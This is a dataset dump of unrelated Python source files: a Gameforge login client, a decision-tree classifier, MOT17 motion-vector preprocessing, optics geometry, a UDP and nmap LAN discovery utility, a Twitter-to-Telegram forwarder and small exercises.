token[1:-1]\n schema, filepath = extractSchemaPath(filename)\n results[out.name] = {\n 'type': 'vector',\n 'name': filepath\n }\n if not schema:\n results[out.name]['location'] = '[The expected result data is not in the testdata directory. Please write it to processing/tests/testdata/expected. Prefer gml files.]'\n elif isinstance(out, OutputHTML):\n filename = token[1:-1]\n schema, filepath = extractSchemaPath(filename)\n results[out.name] = {\n 'type': 'file',\n 'name': filepath\n }\n if not schema:\n results[out.name]['location'] = '[The expected result file is not in the testdata directory. 
Please redirect the output to processing/tests/testdata/expected.]'\n\n definition['results'] = results\n\n dlg = ShowTestDialog(yaml.dump([definition], default_flow_style=False))\n dlg.exec_()\n\n\ndef tr(string):\n return QCoreApplication.translate('TestTools', string)\n\n\nclass ShowTestDialog(QDialog):\n\n def __init__(self, s):\n QDialog.__init__(self)\n self.setModal(True)\n self.resize(600, 400)\n self.setWindowTitle(self.tr('Unit test'))\n layout = QVBoxLayout()\n self.text = QTextEdit()\n self.text.setFontFamily(\"monospace\")\n self.text.setEnabled(True)\n self.text.setText(s)\n layout.addWidget(self.text)\n self.setLayout(layout)\n QMetaObject.connectSlotsByName(self)\n","sub_path":"processing/gui/TestTools.py","file_name":"TestTools.py","file_ext":"py","file_size_in_byte":6929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"153965523","text":"import requests\nimport binascii\n\nclass NtLauncher:\n def __init__(self, locale, gfLang, installation_id):\n self.locale = locale\n self.gfLang = gfLang\n self.installation_id = installation_id\n self.token = None\n self.platformUserId = None\n\n def auth(self, username, password):\n self.username = username\n self.password = password\n\n URL = \"https://spark.gameforge.com/api/v1/auth/thin/sessions\"\n HEADERS = {\n \"User-Agent\" : \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36\",\n \"TNT-Installation-Id\" : self.installation_id,\n \"Origin\" : \"spark://www.gameforge.com\"\n }\n\n CONTENT = {\n \"gfLang\" : self.gfLang,\n \"identity\" : self.username,\n \"locale\" : self.locale,\n \"password\" : self.password,\n \"platformGameId\" : \"dd4e22d6-00d1-44b9-8126-d8b40e0cd7c9\"\n }\n\n r = requests.post(URL, headers=HEADERS, json=CONTENT)\n if r.status_code != 201:\n return False\n \n response = r.json()\n self.token = response[\"token\"]\n self.platformUserId = response[\"platformUserId\"]\n\n return True\n \n def getAccounts(self):\n if not self.token or not self.platformUserId:\n return False\n \n URL = \"https://spark.gameforge.com/api/v1/user/accounts\"\n\n HEADERS = {\n \"User-Agent\" : \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36\",\n \"TNT-Installation-Id\" : self.installation_id,\n \"Origin\" : \"spark://www.gameforge.com\",\n \"Authorization\" : \"Bearer {}\".format(self.token),\n \"Connection\" : \"Keep-Alive\"\n }\n\n r = requests.get(URL, headers=HEADERS)\n\n if r.status_code != 200:\n return False\n\n return list(r.json().keys())\n\n def _convertToken(self, guid):\n return binascii.hexlify(guid.encode()).decode()\n\n def getToken(self, account):\n if not self.token or not self.platformUserId:\n return False\n \n URL = \"https://spark.gameforge.com/api/v1/auth/thin/codes\"\n\n HEADERS = {\n \"User-Agent\" : \"GameforgeClient/2.0.48\",\n \"TNT-Installation-Id\" : self.installation_id,\n \"Origin\" : \"spark://www.gameforge.com\",\n \"Authorization\" : \"Bearer {}\".format(self.token),\n \"Connection\" : \"Keep-Alive\"\n }\n\n CONTENT = {\n \"platformGameAccountId\" : account\n }\n\n r = requests.post(URL, headers=HEADERS, json=CONTENT)\n\n if r.status_code != 201:\n return False\n\n return self._convertToken(r.json()[\"code\"])\n","sub_path":"ntauth/loginapi.py","file_name":"loginapi.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} 
+{"seq_id":"177171069","text":"import requests\nimport datetime\nfrom pytz import timezone\n\n\ndef get_number_of_pages(url):\n return requests.get(url).json()['number_of_pages']\n\n\ndef get_list_of_attempts(number_of_pages, url):\n attempts = []\n # pages are 1-indexed, so include the last page\n for number_of_page in range(1, number_of_pages + 1):\n page = {'page': number_of_page}\n response = requests.get(url, params=page).json()['records']\n # collect every record on the page\n attempts.extend(response)\n return attempts\n\n\ndef get_midnighters(attempts):\n midnighters = set()\n midnight = datetime.time(0)\n morning = datetime.time(6)\n existing_timestamp = filter(lambda x: x['timestamp'] is not None, attempts)\n for attempt in existing_timestamp:\n tz = timezone(attempt['timezone'])\n srv_time = attempt['timestamp']\n user_time = tz.localize(datetime.datetime.fromtimestamp(srv_time))\n if midnight < user_time.time() < morning:\n midnighters.add(attempt['username'])\n return midnighters\n\n\nif __name__ == '__main__':\n url = 'http://devman.org/api/challenges/solution_attempts/'\n number_of_pages = get_number_of_pages(url)\n attempts = get_list_of_attempts(number_of_pages, url)\n print(get_midnighters(attempts))\n","sub_path":"seek_dev_nighters.py","file_name":"seek_dev_nighters.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"429665480","text":"from numpy import matrix, sin, cos\nZ = lambda theta : matrix([[cos(theta), -sin(theta), 0],[sin(theta), cos(theta), 0],[0,0,1]])\nY = lambda phi : matrix([[cos(phi),0, sin(phi)],[0,1,0],[-sin(phi), 0, cos(phi)]])\nX = lambda alpha : matrix([[1,0,0],[0, cos(alpha), -sin(alpha)],[0, sin(alpha), cos(alpha)]])\n\n#Euler rotation matrix conventions: alpha rotates about X, phi about Y, theta about Z\nXYZ = lambda alpha, phi, theta : X(alpha)*Y(phi)*Z(theta)\nZXY = lambda alpha, phi, theta : Z(theta)*X(alpha)*Y(phi)\nYXZ = lambda alpha, phi, theta : Y(phi)*X(alpha)*Z(theta)\n\nZXZ = lambda theta, alpha, theta2 : Z(theta)*X(alpha)*Z(theta2)\nZYZ = lambda theta, phi, theta2 : Z(theta)*Y(phi)*Z(theta2)\nZYX = lambda theta, phi, alpha : Z(theta)*Y(phi)*X(alpha)\n\ntransform = lambda atom_coords, center, shift, rotationMatrix: rotationMatrix*(atom_coords - center)+shift","sub_path":"libraries/rotationMatrices.py","file_name":"rotationMatrices.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"161724341","text":"# Version 1.0\nimport numpy as np\nimport pandas as pd\n\nclass DecisionTreeClassifier:\n \"\"\" A basic ID3 Decision Tree\"\"\"\n\n def __init__(self, dataset, nFeatures=0):\n self.dataset = dataset\n self.tree = pd.Series(dtype=object)\n self.nFeatures = nFeatures\n self.make_tree(self.dataset.examples, self.tree)\n\n def entropy(self, df):\n p = df.iloc[:, -1].value_counts() / len(df)\n return (-p * np.log2(p)).sum()\n\n def info_gain(self, df, feature):\n p = df[feature].value_counts() / len(df)\n\n for v in p.index:\n p.loc[v] *= self.entropy(df[df[feature] == v])\n\n return self.entropy(df) - p.sum()\n\n def best_feature(self, df):\n features = df.columns[:-1].copy().values\n if self.nFeatures != 0:\n # draw a random subset of nFeatures candidate features\n f_indexes = np.arange(len(features))\n np.random.shuffle(f_indexes)\n features = features[f_indexes[:min(self.nFeatures, len(features))]]\n\n info = pd.DataFrame({\"feature\": features})\n info['gain'] = [self.info_gain(df, f) for f in features]\n return info['feature'][info['gain'].argmax()]\n\n\n def print_tree(self, name='', node=None, depth=1):\n if 
node is None:\n node = self.tree\n \n for f in node.index:\n if isinstance(node[f], tuple):\n if f != '-^-':\n print(' ' * depth, f, ' => ', node[f], sep='')\n else:\n print(' ' * depth, f, ': ', sep='')\n self.print_tree(f, node[f], depth + 1)\n \n def make_tree(self, df, node, feature=None):\n if feature is None:\n feature = self.best_feature(df)\n \n node[feature] = pd.Series(dtype=object)\n \n # Store the plurality vote class at the feature level\n # under a \"hidden\" _^_ key just in case we need it for\n # when the unseen example does not lead to a leaf.\n node[feature]['-^-'] = (feature, df.iloc[:, -1].mode()[0])\n \n fvalues = df[feature].unique()\n for v in fvalues:\n d = df[df[feature] == v]\n n_classes = len(d.iloc[:, -1].unique())\n if n_classes == 1:\n node[feature][v] = ('L', d.iloc[:, -1].iloc[0])\n elif n_classes > 1:\n d = d.drop([feature], axis=1)\n if len(d.columns) == 1: \n node[feature][v] = ('L', d.iloc[:, -1].mode()[0])\n else:\n next_best_feature = self.best_feature(d)\n node[feature][v] = pd.Series(dtype=object)\n self.make_tree(d, node[feature][v] ,next_best_feature)\n else:\n pass\n\n def predict(self, unseen, node=None):\n \"\"\"\n Returns the most probable label (or class) for each unseen input. The\n unseen needs to be a data series with the same features (as indexes) as the \n training data. It can also be a data frame with the same features as \n the training data.\n \"\"\"\n if unseen.ndim == 1:\n if node is None:\n node = self.tree\n\n feature = node.index[0]\n children = node[feature]\n value = unseen[feature]\n for c in children.index:\n if c == value:\n if isinstance(children[c], tuple):\n return children[c][1]\n else:\n return self.predict(unseen, children[c])\n \n # If this is reached, then a leaf was not reached. 
We return\n # a plurality vote at the deepest node reached.\n return children['-^-'][1]\n else:\n return np.array([self.predict(unseen.iloc[i,:]) for i in range(len(unseen))]) \n \n def __repr__(self):\n return repr(self.tree)\n \n","sub_path":"mylib/decision_tree_classifier.py","file_name":"decision_tree_classifier.py","file_ext":"py","file_size_in_byte":3864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"222097157","text":"import os\nimport glob\nimport math\nimport pickle\n\nimport torch\nimport numpy as np\nfrom tqdm import tqdm\nfrom scipy.interpolate import griddata\n\nfrom video_cap import VideoCap\n\n\ndef load_detections(det_file, num_frames):\n detections = []\n raw_data = np.genfromtxt(det_file, delimiter=',')\n for frame_idx in range(num_frames):\n idx = np.where(raw_data[:, 0] == frame_idx+1)\n if idx[0].size:\n detections.append(np.stack(raw_data[idx], axis=0)[:, 2:6])\n else:\n detections.append(np.empty(shape=(0,10)))\n return detections\n\n\ndef load_groundtruth(gt_file, only_eval=False):\n \"\"\"\n Args:\n gt_file (string): Full path of a MOT groundtruth txt file.\n\n only_eval (bool): If False load all groundtruth entries, otherwise\n load only entries in which column 7 is 1 indicating an entry that\n is to be considered during evaluation.\n \"\"\"\n gt_boxes = []\n gt_ids = []\n gt_classes = []\n raw_data = np.genfromtxt(gt_file, delimiter=',')\n for frame_idx in sorted(set(raw_data[:, 0])):\n idx = np.where(raw_data[:, 0] == frame_idx)\n gt_box = np.stack(raw_data[idx], axis=0)[:, 2:6]\n gt_id = np.stack(raw_data[idx], axis=0)[:, 1]\n gt_class = np.stack(raw_data[idx], axis=0)[:, 7]\n consider_in_eval = np.stack(raw_data[idx], axis=0)[:, 6]\n consider_in_eval = consider_in_eval.astype(np.bool)\n if only_eval:\n gt_box = gt_box[consider_in_eval]\n gt_id = gt_id[consider_in_eval]\n gt_boxes.append(gt_box)\n gt_ids.append(gt_id)\n gt_classes.append(gt_class)\n return gt_ids, gt_boxes, gt_classes\n\n\ndef normalize_vectors(motion_vectors):\n \"\"\"Normalizes motion vectors to the past frame as reference frame.\n\n The source value in the first column is set to -1 for all frames. The x and\n y motion values are scaled accordingly. Vector source position and\n destination position are unchanged.\n\n Args:\n motion_vectors (`numpy.ndarray`): Array of shape (N, 11) containing all\n N motion vectors inside a frame. N = 0 is allowed meaning no vectors\n are present in the frame.\n\n Returns:\n motion_vectors (`numpy.ndarray`): Array of shape (M, 11) containing the\n normalized motion vectors. 
If N = 0 => M = 0 that is an empty numpy\n array of shape (0, 11) is returned.\n \"\"\"\n if np.shape(motion_vectors)[0] == 0:\n return motion_vectors\n else:\n motion_vectors[:, 7] = motion_vectors[:, 7] / motion_vectors[:, 0] # motion_x\n motion_vectors[:, 8] = motion_vectors[:, 8] / motion_vectors[:, 0] # motion_y\n motion_vectors[:, 0] = -1 * np.ones_like(motion_vectors[:, 0])\n return motion_vectors\n\n\ndef interp_motion_vectors(motion_vectors, frame_shape=(1920, 1080)):\n mvs_x = motion_vectors[:, 5]\n mvs_y = motion_vectors[:, 6]\n mvs_x_motion = motion_vectors[:, 7] / motion_vectors[:, 9]\n mvs_y_motion = motion_vectors[:, 8] / motion_vectors[:, 9]\n # takes 5.72 ms (average of 1000 runs)\n xi = np.arange(8, frame_shape[0]+1, 16)\n yi = np.arange(8, frame_shape[1]+1, 16)\n mvs_x_motion_interp = griddata((mvs_x, mvs_y), mvs_x_motion, (xi[None, :], yi[:, None]), method='nearest')\n mvs_y_motion_interp = griddata((mvs_x, mvs_y), mvs_y_motion, (xi[None, :], yi[:, None]), method='nearest')\n return mvs_x_motion_interp, mvs_y_motion_interp\n\n\ndef motion_vectors_to_grid(motion_vectors, frame_shape=(1920, 1080)):\n \"\"\"Converts motion vectors list into 3D matrix.\"\"\"\n motion_vectors_grid = np.zeros((2, math.ceil(frame_shape[1]/16), math.ceil(frame_shape[0]/16)))\n mvs_x = motion_vectors[:, 5]\n mvs_y = motion_vectors[:, 6]\n x = (mvs_x - 8) // 16\n y = (mvs_y - 8) // 16\n motion_vectors_grid[0, y, x] = motion_vectors[:, 7] / motion_vectors[:, 9] # x component\n motion_vectors_grid[1, y, x] = motion_vectors[:, 8] / motion_vectors[:, 9] # y component\n return motion_vectors_grid\n\n\nif __name__ == \"__main__\":\n\n sequences = {\n \"train\": [\n \"MOT17-02\",\n \"MOT17-04\",\n #\"MOT17-05\",\n \"MOT17-11\",\n \"MOT17-13\",\n ],\n \"val\": [\n \"MOT17-09\",\n \"MOT17-10\",\n ],\n \"test\": [\n \"MOT17-01\",\n \"MOT17-03\",\n \"MOT17-06\",\n \"MOT17-07\",\n \"MOT17-08\",\n \"MOT17-12\",\n \"MOT17-14\",\n ]\n }\n\n frame_shapes = {\n \"train\": [(1920, 1080), # MOT17-02\n (1920, 1080), # MOT17-04\n #(640, 480), # MOT17-05\n (1920, 1080), # MOT17-11\n (1920, 1080)], # MOT17-13\n \"val\": [(1920, 1080), # MOT17-09\n (1920, 1080)], # MOT17-10\n \"test\": [(1920, 1080), # MOT17-01\n (1920, 1080), # MOT17-03\n #(640, 480), # MOT17-06\n (1920, 1080), # MOT17-07\n (1920, 1080), # MOT17-08\n (1920, 1080), # MOT17-12\n (1920, 1080)] # MOT17-14\n }\n\n lengths = {\n \"train\": [600, # MOT17-02\n 1050, # MOT17-04\n #837, # MOT17-05\n 900, # MOT17-11\n 750], # MOT17-13\n \"val\": [525, # MOT17-09\n 654], # MOT17-10\n \"test\": [450, # MOT17-01\n 1500, # MOT17-03\n #1194, # MOT17-06\n 500, # MOT17-07\n 625, # MOT17-08\n 900, # MOT17-12\n 750] # MOT17-14\n }\n\n codec = \"mpeg4\" # whether to use h264 or mpeg4 video sequences\n\n for mode in [\"train\", \"val\", \"test\"]:\n\n data = []\n\n for sequence, frame_shape in zip(sequences[mode], frame_shapes[mode]):\n\n if mode == \"val\":\n dirname = os.path.join(\"train\", \"{}-FRCNN\".format(sequence))\n else:\n dirname = os.path.join(mode, \"{}-FRCNN\".format(sequence))\n\n if codec == \"h264\":\n video_file = os.path.join(\"sequences\", \"h264\", \"{}.mp4\".format(sequence))\n elif codec == \"mpeg4\":\n video_file = os.path.join(\"sequences\", \"mpeg4\", \"{}.avi\".format(sequence))\n\n num_frames = len(glob.glob(os.path.join(dirname, 'img1/*.jpg')))\n detections = load_detections(os.path.join(dirname, 'det/det.txt'), num_frames)\n if mode == \"train\" or mode == \"val\":\n gt_ids, gt_boxes, _ = load_groundtruth(os.path.join(dirname, 'gt/gt.txt'), 
only_eval=True)\n\n print(\"Extracting motion vectors for sequence {}\".format(sequence))\n\n cap = VideoCap()\n ret = cap.open(video_file)\n if not ret:\n raise RuntimeError(\"Could not open the video file\")\n\n pbar = tqdm(total=num_frames)\n for frame_idx in range(0, num_frames):\n ret, frame, motion_vectors, frame_type, _ = cap.read()\n if not ret:\n break\n\n pbar.update()\n\n data_item = {\n \"frame_idx\": frame_idx,\n \"sequence\": sequence,\n \"frame_type\": frame_type,\n \"det_boxes\": detections[frame_idx]\n }\n\n # bounding boxes\n if mode == \"train\" or mode == \"val\":\n data_item[\"gt_boxes\"] = gt_boxes[frame_idx]\n data_item[\"gt_ids\"] = gt_ids[frame_idx]\n else:\n data_item[\"gt_boxes\"] = []\n data_item[\"gt_ids\"] = []\n\n\n # motion vectors (interpolated on regular 16x16 grid)\n if frame_type != \"I\":\n motion_vectors = normalize_vectors(motion_vectors)\n if codec == \"h264\":\n mvs_x_interp, mvs_y_interp = interp_motion_vectors(motion_vectors, frame_shape)\n mvs = torch.from_numpy(np.dstack((mvs_x_interp, mvs_y_interp)))\n mvs = mvs.permute(2, 0, 1).float() # store as C, H, W\n elif codec == \"mpeg4\":\n mvs = motion_vectors_to_grid(motion_vectors)\n mvs = torch.from_numpy(mvs).float()\n data_item[\"motion_vectors\"] = mvs\n else:\n data_item[\"motion_vectors\"] = torch.zeros([2, 68, 120], dtype=torch.float)\n\n data.append(data_item)\n\n cap.release()\n pbar.close()\n\n pickle.dump(data, open(os.path.join(\"preprocessed\", codec, mode, \"data.pkl\"), 'wb'))\n pickle.dump(lengths[mode], open(os.path.join(\"preprocessed\", codec, mode, \"lengths.pkl\"), 'wb'))\n","sub_path":"old/benchmark/MOT17/compute_motion_vectors (copy).py","file_name":"compute_motion_vectors (copy).py","file_ext":"py","file_size_in_byte":8801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"507138097","text":"import numpy as np\nfrom typing import List, Tuple, Union\nimport math\n\nimport App.properties.trace_properties\nfrom surfaces.surface import Surface\nfrom surfaces.additional.general_methods import keep_positive_number\n\n\nclass Sphere(Surface):\n \"\"\"\n (r-p0,r-p0) = R^2 - canonical equation of sphere\n :argument center - сооrdinate of sphere center\n :argument radius - radius of sphere\n :argument type_surface - reflecting or refracting surface\n :argument n1,n2 - refractive indexes of space. watch method get_refractive_indexes in class Surface\n \"\"\"\n\n def __init__(self, center: list, radius: float,\n type_surface: Surface.types = Surface.types.REFLECTING,\n n1: float = 1,\n n2: float = 1):\n if n1 < 1 or n2 < 1:\n raise AttributeError(\"Refractive indices less than unity. 
n1: {}, n2: {}\".format(n1, n2))\n if not all(isinstance(i, float) or isinstance(i, int) for i in center):\n raise AttributeError(\"\"\"Some element in %s is not a float number.\"\"\" % (str(center)))\n\n Surface.__init__(self, type_of_surface=type_surface, dimension=len(center))\n self.__center = center.copy()\n self.__r = radius\n self._Surface__n1 = n1\n self._Surface__n2 = n2\n\n # =========================== getter and setter ====================================================================\n\n @property\n def center(self):\n return self.__center\n\n @property\n def r(self):\n return self.__r\n\n # ============================== Sphere object methods =============================================================\n\n def __str__(self):\n return \"Sphere:{ center: %s, radius: %s, type: %s}\" % (str(self.center), str(self.r), str(self.type))\n\n # def draw_surface(self, axes, color='b', alpha=0.5) -> bool:\n # if self.dim == 2:\n #\n # elif self.dim == 3:\n # u = np.linspace(0, 2 * np.pi, 100)\n # v = np.linspace(0, np.pi, 100)\n #\n # x = np.subtract(self.r * np.outer(np.cos(u), np.sin(v)), -self.center[0])\n # y = np.subtract(self.r * np.outer(np.sin(u), np.sin(v)), -self.center[1])\n # z = np.subtract(self.r * np.outer(np.ones(np.size(u)), np.cos(v)), -self.center[2])\n # print('x = ')\n # print(x)\n # print('y = ')\n # print(y)\n #\n # axes.plot_surface(x, y, z, rstride=4, cstride=4, color=color, alpha=alpha)\n # return True\n #\n # raise AttributeError(\"Defined only dor dimension 2 and 3\")\n\n def is_point_belong(self, point: (list, tuple)) -> bool:\n if len(point) != self.dim:\n raise AttributeError(\"The point %s have different dimension than sphere(%s)\" % (str(point), str(self.dim)))\n\n r0 = np.subtract(point, self.center)\n if abs(np.linalg.norm(r0) - self.r) < 10 * np.finfo(float).eps:\n return True\n\n def norm_vec(self, point):\n # if not self.is_point_belong(point):\n # raise AttributeError(\"The point %s is not belong surface %s\" % (str(point), str(self)))\n\n n = []\n for i in range(self.dim):\n n.append(2 * (point[i] - self.center[i]))\n\n return np.dot(1 / np.linalg.norm(n), n)\n\n def get_refractive_indexes(self, point: list):\n \"\"\"\n returns 2 coefficients\n :param point:\n :return: n1,n2\n \"\"\"\n \"\"\"\n n1 - outside of sphere\n n2 - on sphere and inside sphere\"\"\"\n rad_vec = np.subtract(point, self.center)\n if np.linalg.norm(rad_vec) - self.r > 10 * np.finfo(float).eps:\n return self._Surface__n1, self._Surface__n2\n return self._Surface__n2, self._Surface__n1\n\n # ======================================= methods for Ray ==========================================================\n def ray_surface_intersection(self, e: list, r: list) -> List[Union[float, int]]:\n r0_p0 = np.subtract(self.center, r)\n r0_p0e = np.dot(r0_p0, e)\n # ищем дискриминант\n disc = r0_p0e ** 2 - np.dot(r0_p0, r0_p0) + self.r ** 2\n if (abs(disc) < np.finfo(float).eps):\n disc = 0\n\n if disc < 0:\n return []\n # ищем корни/корень\n t = None\n if (disc != 0):\n sqrt_disc = math.sqrt(disc)\n t = [r0_p0e - sqrt_disc, r0_p0e + sqrt_disc]\n else:\n t = [r0_p0e]\n return keep_positive_number(t, eps=App.properties.trace_properties.MINIMAL_END_LENGTH_OF_RAY)\n\n # ======================================== methods for Ray_pool ====================================================\n # methods \"find_intersection_pool_with_surface\" and \"find_nearest_intersection_pool_with_surface\"\n # is realized in class 
Surface\n","sub_path":"surfaces/analitic/sphere.py","file_name":"sphere.py","file_ext":"py","file_size_in_byte":4849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"384505704","text":"import binascii\nfrom nmap import PortScanner\nimport socket\nfrom PyQt4.QtCore import SIGNAL, QThread\n\n\nclass StatParser(dict):\n\n def __init__(self):\n super(StatParser, self).__init__()\n\n def parse(self, code):\n if len(code) != 36:\n raise\n self['type'] = code[2]\n self['serial'] = ''.join(str(i) for i in code[3:5])\n self['version'] = code[5]\n self['mac'] = '-'.join(str(i) for i in code[6:12])\n self['gateway'] = '.'.join(str(i) for i in code[12:16])\n self['mask'] = '.'.join(str(i) for i in code[16:20])\n self['ip'] = '.'.join(str(i) for i in code[20:24])\n self['port'] = ''.join(str(i) for i in code[24:26])\n self['config'] = code[26:-2]\n self['code'] = ''.join(str(i) for i in code[-2:])\n\n\nclass ServerScanner(PortScanner):\n\n def __init__(self):\n super(ServerScanner, self).__init__()\n\n def discover(self):\n host_ip = socket.gethostbyname(socket.getfqdn())\n # 假定ip为C类,子网掩码为255.255.255.0\n subnet = host_ip + '/24'\n self.scan(hosts=subnet, arguments='-n -sn -PE -PA21,23,80,3389,5000')\n yield from [x for x in self.all_hosts()\n if self[x]['status']['state'] == 'up' if x != host_ip]\n\n\nclass UDPClient(QThread):\n\n def __init__(self):\n super(UDPClient, self).__init__()\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\n self.sock.setblocking(False)\n self.running = False\n self.receiving = False\n\n def bind(self, addr):\n self.sock.bind(addr)\n\n def sendto(self, msg, addr):\n msg = msg.encode()\n self.sock.sendto(msg, addr)\n\n def run(self):\n self.running = True\n self.receiving = True\n self.emit(SIGNAL('showInfo(QString)'), 'UDP started')\n while self.receiving:\n try:\n data, addr = self.sock.recvfrom(5120)\n self.emit(SIGNAL('showInfo(QString)'), data.decode())\n except socket.error:\n pass\n else:\n self.emit(SIGNAL('showInfo(QString)'), 'UDP stopped')\n\n def stop(self):\n self.receiving = False\n\n def close(self):\n self.running = False\n self.receiving = False\n self.emit(SIGNAL('showInfo(QString)'), 'UDP closed')\n self.sock.close()\n\n\nif __name__ == '__main__':\n client = UDPClient()\n # client.set_bind(('', 6000))\n client.sendto('hello', ('192.168.1.102', 5000))\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"102210300","text":"import twitter\nfrom time import sleep\nimport telegram\nimport html\nfrom app import config\nimport re\nfrom pprint import pprint\nfrom datetime import datetime\n\nprint('Starting')\n\n\ndef process_tweet(tweet, account):\n print(account + str(tweet['id']) + ' - ' + tweet['created_at'])\n\n if 'retweet_count' not in tweet and len(tweet['user_mentions']) == 0:\n if 'media' in tweet:\n regex = 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'\n get = re.compile(regex, re.IGNORECASE | re.DOTALL)\n text = get.sub('', tweet['full_text'])\n message = tweet['media'][0]['media_url'] + '\\n\\n' + text\n else:\n message = tweet['full_text']\n\n if 'quoted_status' in tweet:\n regex = 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'\n get = re.compile(regex, re.IGNORECASE | re.DOTALL)\n message = get.sub('', 
message)\n message = message + '\\n\\n' + '```' + tweet['quoted_status']['full_text'] + '```'\n\n twitter_text = account + html.unescape(message)\n\n if account == 'OLLY - ':\n send_olly_message(twitter_text)\n else:\n send_message(twitter_text)\n\n\ndef send_message(message):\n sleep(1)\n bot = telegram.Bot(token=config.TELEGRAM_BOT_API_KEY)\n\n # LR Jack's Tips\n try:\n bot.send_message(chat_id='-1001190331415', text=message,\n parse_mode=telegram.ParseMode.MARKDOWN)\n except Exception as e:\n # print('failed to parse markdown, sent as html')\n # pprint(message)\n bot.send_message(chat_id='-1001190331415', text=message,\n parse_mode=telegram.ParseMode.HTML)\n print(e)\n\ndef send_olly_message(message):\n sleep(1)\n bot = telegram.Bot(token=config.TELEGRAM_BOT_API_KEY)\n\n # LR Jack's Tips\n try:\n # Spanners Playground\n bot.send_message(chat_id='-1001456379435', text=message,\n parse_mode=telegram.ParseMode.MARKDOWN)\n except Exception as e:\n # print('failed to parse markdown, sent as html')\n # pprint(message)\n bot.send_message(chat_id='-1001190331415', text=message,\n parse_mode=telegram.ParseMode.HTML)\n print(e)\n\n\napi = twitter.Api(consumer_key=config.API_KEY,\n consumer_secret=config.API_SECRET,\n access_token_key=config.ACCESS_TOKEN,\n access_token_secret=config.ACCESS_TOKEN_SECRET,\n cache=None,\n tweet_mode='extended')\n\n# try:\nwhile True:\n try:\n # pt = api.GetUserTimeline(screen_name=\"@TopRacingTipsRP\", count=200)\n tt = api.GetUserTimeline(screen_name=\"@spannerjago\", count=1)\n pt = api.GetUserTimeline(screen_name=\"@TRTPremium\", count=20)\n gt = api.GetUserTimeline(screen_name=\"@TRTGold\", count=20)\n ro = api.GetUserTimeline(screen_name=\"@Raceolly\", count=20)\n\n p_tweets = [i.AsDict() for i in pt]\n g_tweets = [i.AsDict() for i in gt]\n t_tweets = [i.AsDict() for i in tt]\n r_tweets = [i.AsDict() for i in ro]\n\n for p_tweet in reversed(p_tweets):\n with open('p_ids.txt', 'r') as f:\n last_id = int(f.read())\n\n if p_tweet['id'] > last_id:\n process_tweet(p_tweet, 'PREMIUM - ')\n\n with open('p_ids.txt', 'w') as f:\n f.write(str(p_tweet['id']))\n\n for g_tweet in reversed(g_tweets):\n with open('g_ids.txt', 'r') as f:\n last_id = int(f.read())\n\n if g_tweet['id'] > last_id:\n g_results_list = process_tweet(g_tweet, 'GOLD - ')\n\n with open('g_ids.txt', 'w') as f:\n f.write(str(g_tweet['id']))\n\n for r_tweet in reversed(r_tweets):\n # print(r_tweet)\n with open('r_ids.txt', 'r') as f:\n last_id = int(f.read())\n\n if r_tweet['id'] > last_id:\n r_results_list = process_tweet(r_tweet, 'OLLY - ')\n\n with open('r_ids.txt', 'w') as f:\n f.write(str(r_tweet['id']))\n\n for t_tweet in reversed(t_tweets):\n with open('t_ids.txt', 'r') as f:\n last_id = int(f.read())\n\n if 'media' in t_tweet:\n get = re.compile('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+',re.IGNORECASE|re.DOTALL)\n text = get.sub('', t_tweet['full_text'])\n tweet = t_tweet['media'][0]['media_url'] + '\\n\\n' + text\n else:\n tweet = t_tweet['full_text']\n\n if t_tweet['id'] > last_id:\n print('TEST - ' + str(t_tweet['id']) + ' - ' + t_tweet['created_at'])\n token = config.TELEGRAM_BOT_API_KEY\n bot = telegram.Bot(token=token)\n # Spanners Playground\n bot.send_message(chat_id='-1001456379435',\n text=tweet,\n parse_mode=telegram.ParseMode.MARKDOWN)\n\n with open('t_ids.txt', 'w') as f:\n f.write(str(t_tweet['id']))\n\n # print('Sleeping at ' + strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()))\n sleep(10)\n except KeyboardInterrupt:\n print('Keyboard interrupt')\n 
break\n except Exception as e:\n sleep(2)\n print('General Exception', flush=True)\n print(str(e))\n continue\n","sub_path":"trt.py","file_name":"trt.py","file_ext":"py","file_size_in_byte":5533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"105486278","text":"#prints b to the power of n\nimport time\n\n#recursive version\ndef power(b, n):\n if n==0:\n return 1\n else:\n return b*power(b, n-1)\n\n#iterative version\ndef power_iteratif(b, n):\n p=1\n for i in range(0, n):\n p=p*b\n\n return p\n\n#time both implementations\nstart=time.time()\n\nx=power_iteratif(2,10)\ny=power(2, 10)\n\nend=time.time()\nprint(end-start)\n\nprint(x)\nprint(y)\n\n","sub_path":"MY_EXERCISE/uslu_recursive.py","file_name":"uslu_recursive.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
